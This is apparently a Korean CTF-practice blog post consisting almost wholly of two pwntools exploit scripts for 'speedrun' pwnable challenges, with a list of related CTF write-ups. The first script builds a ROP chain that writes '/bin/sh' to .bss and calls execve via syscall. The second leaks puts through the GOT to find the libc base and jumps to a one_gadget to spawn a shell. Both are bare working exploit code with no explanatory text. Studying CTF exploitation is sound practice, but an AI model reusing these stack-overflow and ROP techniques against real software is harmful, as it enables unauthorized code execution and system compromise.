speedrun1_exploit.py
from pwn import *
p = process("./vuln")
e = ELF('./vuln')
syscall = 0x474e65
pop_eax = 0x415664
pop_rdi = 0x400686
pop_rsi = 0x4101f3
pop_rdx = 0x4498b5
binsh = "/bin/sh\x00"
payload = "A"*0x400
payload += "B"*8
payload += p64(pop_eax)
payload += p64(0)
payload += p64(pop_rdi)
payload += p64(0)
payload += p64(pop_rsi)
payload += p64(e.bss())
payload += p64(pop_rdx)
payload += p64(len(binsh))
payload += p64(syscall)
payload += p64(pop_eax)
payload += p64(59)
payload += p64(pop_rdi)
payload += p64(e.bss())
payload += p64(pop_rsi)
payload += p64(0)
payload += p64(pop_rdx)
payload += p64(0)
payload += p64(syscall)
p.sendlineafter("words?\n",payload)
sleep(0.1)
p.send(binsh)
p.interactive()
speedrun2_exploit.py
from pwn import *
p = process("./vuln")
e = ELF('./vuln')
l = e.libc
p.sendlineafter("now?\n","Everything intelligent is so boring.")
pr = 0x4008a3
payload = "A"*(0x400+8)
payload += p64(pr)
payload += p64(e.got['puts'])
payload += p64(e.plt['puts'])
payload += p64(0x40074C)
p.sendlineafter("more.\n",payload)
print p.recvuntil("Fascinating.\n")
puts_addr = u64(p.recv(6).ljust(8,"\x00"))
libc_base = puts_addr - l.symbols['puts']
one_addr = libc_base + 0x10a38c
p.sendlineafter("now?\n","Everything intelligent is so boring.")
payload2 = "A"*(0x400+8)
payload2 += p64(one_addr)
print p.sendlineafter("more.\n",payload2)
sleep(0.1)
p.interactive()'System > Pwnable Practice' 카테고리의 다른 글
| Pico CTF 2018 echooo (0) | 2019.08.04 |
|---|---|
| Layer7 CTF 2018 Talmoru_party!~ (0) | 2019.08.02 |
| Harekaze CTF 2019 Baby ROP 1,2 (0) | 2019.08.01 |
| Hitcon CTF 2017 start (0) | 2019.07.30 |
| Codegate 2019 CTF aeiou (0) | 2019.07.30 |
JeonYoungSin
메모 기록용 공간